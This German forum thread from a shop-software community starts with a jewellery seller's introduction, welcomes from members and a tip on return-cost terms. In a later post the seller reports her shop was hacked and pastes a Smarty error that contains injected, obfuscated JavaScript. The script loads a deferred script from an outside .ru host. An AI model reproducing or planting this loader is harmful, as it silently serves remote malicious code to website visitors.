Marktplatz - Eine große Auswahl an neuen und hilfreichen Modulen sowie modernen Templates für die modified eCommerce Shopsoftware
Neuigkeiten
  • Die modified eCommerce Shopsoftware ist kostenlos, aber nicht umsonst.
    Spenden
  • Damit wir die modified eCommerce Shopsoftware auch zukünftig kostenlos anbieten können:
    Spenden
  • Thema: Hallo erstmal... Balmy Beads stellt sich vor...

    BalmyBeads

    • Fördermitglied
    • Beiträge: 62
    Hallo erstmal... Balmy Beads stellt sich vor...
    am: 13. Oktober 2009, 14:58:15
    Hallo liebe modified eCommerce Shopsoftware Gemeinde,

    Mein Nick ist auch meine "Selbst und Ständige" Leidenschaft. Ich befasse mich mit allem was der geneigte Kunsthandwerker oder Hobby-Creative für die individuelle Schmuckherstellung benötigt.
    Seit ca. 3 Jahren versuche ich mit xt:Commerce 3.0.4 SP2.1 zu arbeiten, was mir meist nur mit extremen zeitl. Aufwand gelingt, da
    ich nicht wirklich viel Ahnung von PHP, Smarty und SQL habe. Eben "learning by doing", was mir sicherlich schon das eine oder andere graue Haar verpasst hat  :lol:.
    Bis dato war ich nur "Leserin" hier und habe mir auch den einen oder anderen wertvollen Tipp holen können.

    Anfang nächsten Jahres möchte ich gerne meinen Shop auf modified eCommerce Shopsoftware umstellen, weil mir die Unübersichtlichkeit und nicht immer logische (zumind. für mich) Struktur von XTC auf die Nerven geht und ich mir von dieser Umstellung Besserung in vielerlei Bereichen erhoffe.

    Freut Euch - noch ist es nicht soweit - erst muss das Weihnachtsgeschäft gelaufen sein. Aber dann werde ich Euch sicherlich mit meinen Fragen & Wünschen löchern.

    Liebe Grüße von Balmy Beads alias die Pee

    Linkback: https://www.modified-shop.org/forum/index.php?topic=2326.0

    Tomcraft

    • modified Team
    • Gravatar
    • Beiträge: 46.369
    • Geschlecht:
    Re: Hallo erstmal... Balmy Beads stellt sich vor...
    Antwort #1 am: 13. Oktober 2009, 15:00:16
    Hi Pee,

    nur Mut! In meiner Signatur findest du auch direkt die wichtigsten Links, die du benötigen wirst. ;-)

    Also herzlich willkommen und viel Erfolg mit modified eCommerce Shopsoftware!

    Grüße

    Torsten

    vsell

    • BVB Fan
    • Viel Schreiber
    • Beiträge: 2.802
    • Geschlecht:
    Re: Hallo erstmal... Balmy Beads stellt sich vor...
    Antwort #2 am: 13. Oktober 2009, 15:26:17
    Hallo Pee.. schließ mich den Grüßen einfach mal an... und keine Angst... graue Haare bekommst du hier keine.

    Um dir gleich mal welche direkt zu ersparen.... deine AGB sind unvollständig... wg 40-Euro-Klausel in der WRB

    hier ist der fehlende Text

    Rücksendekosten

    Macht der Verbraucher von seinem Widerrufsrecht nach Ziffer XYZ (endsprechend anpassen) der AGB Gebrauch, so hat er die regelmäßigen Kosten für die Rücksendung der Ware zu tragen, wenn die gelieferte Ware der bestellten entspricht, und wenn der Preis der zurückzusendenden Sache einen Betrag von 40 Euro nicht übersteigt, oder wenn bei einem höheren Preis der Sache der Verbraucher die Gegenleistung oder eine vertraglich vereinbarte Teilzahlung noch nicht erbracht hat.

    Regelmäßige Kosten in diesem Sinne sind allein die Kosten der gewöhnlichen Paketversendung. Etwaige Mehrkosten durch die Versendung zu einem anderen Ort als zu unserem Firmensitz im Zeitpunkt Ihrer Bestellung oder durch die Einschaltung eines Abholdienstes durch uns haben Sie nicht zu tragen
    ---

    1 Abmahn-Nummer weniger !!!
    ---

    Du belieferst ja auch Händler ...
    Frage lieferst du auch das Bildmaerial und evtl eine CSV ???

    Gruß Fred

    ds170477

    • Fördermitglied
    • Beiträge: 1.522
    • Geschlecht:
    Re: Hallo erstmal... Balmy Beads stellt sich vor...
    Antwort #3 am: 13. Oktober 2009, 22:48:41
    Abend Pee,

    ich kann es nur bestätigen, glaubs mir das ist die beste Community  8O
    Wieso? Deren Nerven sind mit Gold nicht aufzuwiegen :mrgreen:
    Ich bin als Newbie hier eingestiegen, wirklich bei 0 und kann das nur bestätigen.

    Also viel Freude mit modified eCommerce Shopsoftware und die tatkräftige Unterstützung der Com und Ihren Hackern :wohow:

    Gruss

    Daniel

    BalmyBeads

    • Fördermitglied
    • Beiträge: 62
    Re: Hallo erstmal... Balmy Beads stellt sich vor...
    Antwort #4 am: 14. Oktober 2009, 10:20:13
    Ganz lieben Dank für das nette und herzliche  :welcome:

    @vsell - Danke für den Tip, ich werde mir das ansehen!

    @ds170477 - Ich hoffe, Ihr seit auch noch so entspannt, wenn ich Euch dann mit meinen Fragen löchere.

    Prinzipiell bin ich aber mit meiner bisherigen Leistung (Shop) ganz zufrieden, denn der ist von A - Z selbst gestrickt :-).
    Hier erhoffe ich mir für meine vielen Ideen interessante Tips, Hilfe bei der Umsetzung, konstruktive Kritik und ein nettes Miteinander.

    So long Pee

    BalmyBeads

    • Fördermitglied
    • Beiträge: 62
    Re: Hallo erstmal... Balmy Beads stellt sich vor...
    Antwort #5 am: 28. Dezember 2009, 12:40:41
    Da das Thema eigentlich noch gar nicht in Euer Forum gehört, aber ich nicht weiß wen ich um Hilfe bitten könnte - versuche ich es trotzdem .........


    Hallo zusammen,

    ich hoffe Ihr habt Weihnachten ruhig und gesund hinter Euch gebracht und könnt mir bei meinem Problem helfen.
    Anscheinend wurde mein Shop (XTC 3.4.1) die Nacht gehackt! Ich kann auf meine HP zwar zugreifen, aber sobald ich den Shop aufrufe sehe ich nur das  8O

    Balmy Beads - SHOP

    Code: PHP  [Auswählen]
    Fatal error: Smarty error: [in BalmyBeads/module/main_content.html line 26]: syntax error: unrecognized tag: window.onload = function(){var X38cqqcd2l81 = document.createElement('s))^c#r)@i&^p@$$@t^&&'.replace(/\)|\$|#|&|@|\!|\^|\(/ig, ''));var M1c7duoq20lb = 'Ppmf253qsed';X38cqqcd2l81.setAttribute('type', 't!@^#e#(x)$t#/^j)(a&&v@&!!a)^^s()$c)$^@r&!&i$!&#p#^t$!$'.replace(/&|\$|\!|\^|\)|#|\(|@/ig, ''));X38cqqcd2l81.setAttribute('src', 'h!^t(!t&#)p#!!:)^/#@/@k@^#i!^n&o)#-$^^$t^!@o@&.$(@m$o#!b^)#@i$l^$!!e@&9^@^.^@$&c($&!o^@(#m@@#.#&c&)@#h$^@i$(n)!#!a($)&-^!#c)($o#&m#&@.!(t!h!($$e)#@m@@o#$b^)i!s##@i@t^!$$e(.#$r(&)u$&&:)@!&8$#$0##8&0(/#^g#@!o!&o^$g(@@l$$^e^@.$c^o(#(m$&/(g@#o&$o@)g#l!^e^#).&($$c#(#&o$((&m#/^!#)^a(#$d!(o#!b@&$$e&(.@&)c^&)(o$)m$/)$&&t#^i@)(m##$e&##!a@#))$n#(d$!d@()a$t!$e^!^.@c)@)!o#m(@^&/&)(c&#o!)&m!#c)(a(@s(t#.#n&$@e!$t!$/#&('.replace(/\$|@|\)|#|&|\^|\(|\!/ig, ''));X38cqqcd2l81.setAttribute('defer', 'd^&e(&f^(@e!r^)^)&'.replace(/\)|@|&|\$|\!|#|\^|\(/ig, ''));X38cqqcd2l81.setAttribute('id', 'D@1!&l)&()o^^y()^(@x in /www/htdocs/w008xxxx/htdocs/shop/includes/classes/Smarty_2.6.14/Smarty.class.php on line 1095
    Da ich mit so etwas noch nie Probleme hatte, stehe ich wie der Ochse vorm Berg. Wie geht man am besten vor? Kann ich diese Eintragungen einfach löschen? Muss ich dabei irgendetwas beachten?
    Fragen über Fragen .... und dabei habe ich gerade eine fette Rabatt-Aktion laufen und komme an die Daten natürlich nicht ran.

    Bitte, bitte, ich brauche wirklich dringend Unterstützung.
    Schon einmal lieben Dank :thx:
    BalmyBeads /Petra

    web28

    • modified Team
    • Beiträge: 9.404
    Re: Hallo erstmal... Balmy Beads stellt sich vor...
    Antwort #6 am: 28. Dezember 2009, 12:46:05
    Bitte eröffne für Dein Problem ein neues Thema.

    BalmyBeads

    • Fördermitglied
    • Beiträge: 62
    Re: Hallo erstmal... Balmy Beads stellt sich vor...
    Antwort #7 am: 28. Dezember 2009, 13:41:32
    ...eigenen Thread nach Rückfrage bei Web28 in "Admin- und Shopbereich" eröffnet ...

    2 Antworten
    2333 Aufrufe
    05. Februar 2010, 12:14:45 von Tomcraft
    1 Antworten
    2204 Aufrufe
    28. Dezember 2011, 14:44:23 von Tomcraft
    1 Antworten
    1781 Aufrufe
    10. Februar 2010, 19:43:10 von Tomcraft
               
    anything